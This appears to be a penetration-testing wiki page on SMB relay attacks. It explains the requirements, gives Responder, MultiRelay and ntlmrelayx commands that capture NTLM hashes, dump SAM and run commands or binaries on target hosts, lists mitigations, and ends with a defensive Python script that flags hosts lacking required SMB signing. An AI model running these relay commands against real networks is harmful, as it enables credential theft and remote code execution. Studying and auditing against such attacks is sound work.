Bufu-Sec Wiki

SMB Relay

What is SMB Relay?

  • Capture NTLM authentication attempts (the NTLMv1/v2 hashes) from hosts on the network

  • Relay them to other hosts to authenticate as the captured user

  • No need to crack the captured hashes with hashcat

Requirements

  • SMB signing must be disabled on the target host

  • SMB signing verifies the authenticity of each SMB packet, so a relayed session the attacker cannot sign is rejected

  • The relayed user's credentials must have admin rights on the target machine

Exploitation

# Discover hosts with SMB signing disabled
python RunFinger.py -i 10.0.0.2/24
nmap --script=smb2-security-mode -p 445 -v 10.10.10.0/24

# Turn off HTTP and SMB in Responder.conf
nvim Responder.conf

# Start responder
python Responder.py -I tun0 -rdwv

# Set up relay (MultiRelay.py ships with Responder; ntlmrelayx.py ships with Impacket)

# Target specific host
python MultiRelay.py -t 10.0.2.4 -u ALL

# Target multiple hosts

# Dump SAM hive
python ntlmrelayx.py -tf targets.txt -smb2support

# Interactive SMB shell
python ntlmrelayx.py -tf targets.txt -smb2support -i
nc 127.0.0.1 11000

# Execute command
python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Execute binary
python ntlmrelayx.py -tf targets.txt -smb2support -e "shell.exe"

Mitigation

  • Enable SMB signing on all devices (may cause performance issues with file copies)

  • Disable NTLM authentication on the network; note that Windows can fall back to it if Kerberos stops working

  • Account tiering: limit domain admins to specific tasks

  • Local admin restriction (can increase service desk tickets)
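The "SMB signing" requirement above and the "Enable SMB signing" mitigation are two sides of the same setting, so a defender's first step is the same discovery the Exploitation section runs with nmap, read from the other direction: which hosts do not require signing and therefore need remediation. The script below is an added example and not part of the Bufu-Sec wiki or of nmap; it assumes the normal (-oN style) text output of `nmap --script=smb2-security-mode -p 445`, and the scan excerpt embedded in it is constructed for illustration (the addresses are not real hosts). It only covers the server-side setting that nmap reports; the client-side signing setting on workstations is a separate check.

```python
"""Audit nmap smb2-security-mode output for hosts that still accept unsigned
SMB sessions, i.e. hosts on which SMB signing is not *required*.

Added example (not wiki or nmap code). Assumes the plain-text output of
`nmap --script=smb2-security-mode -p 445`; the sample below is constructed.
"""
import re
from typing import Dict, List

# Constructed sample of nmap normal output for three hosts. The three status
# strings are the ones the smb2-security-mode NSE script prints.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.5
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.7
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.9
Host is up (0.0031s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing disabled and not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SIGNING_RE = re.compile(r"^\|_?\s+Message signing (.+)$")


def parse_signing_modes(nmap_text: str) -> Dict[str, str]:
    """Map each scanned host to the signing status string nmap reported."""
    modes: Dict[str, str] = {}
    current = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)  # new host block starts here
            continue
        m = SIGNING_RE.match(line)
        if m and current:
            modes[current] = m.group(1).strip()
    return modes


def relay_exposed_hosts(modes: Dict[str, str]) -> List[str]:
    """Hosts that do not require signing: an unsigned (relayed) session is accepted.

    'enabled but not required' is as exposed as 'disabled and not required';
    only 'enabled and required' rejects a session the relay cannot sign.
    """
    return sorted(h for h, status in modes.items() if "not required" in status)


def remediation_report(nmap_text: str) -> str:
    """Human-readable list of hosts on which RequireSecuritySignature should be enforced."""
    modes = parse_signing_modes(nmap_text)
    exposed = relay_exposed_hosts(modes)
    if not exposed:
        return "All scanned hosts require SMB signing."
    lines = ["Hosts that must have SMB signing set to 'required':"]
    lines += [f"  {host}: {modes[host]}" for host in exposed]
    return "\n".join(lines)


if __name__ == "__main__":
    print(remediation_report(SAMPLE_NMAP_OUTPUT))
```

Feed a real scan in with `nmap --script=smb2-security-mode -p 445 -oN scan.txt <range>` and `remediation_report(open("scan.txt").read())`; hosts it lists are the ones the relay commands in the Exploitation section would succeed against, and they disappear from the list once signing is set to required and the scan is repeated.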


Last updated 2 years ago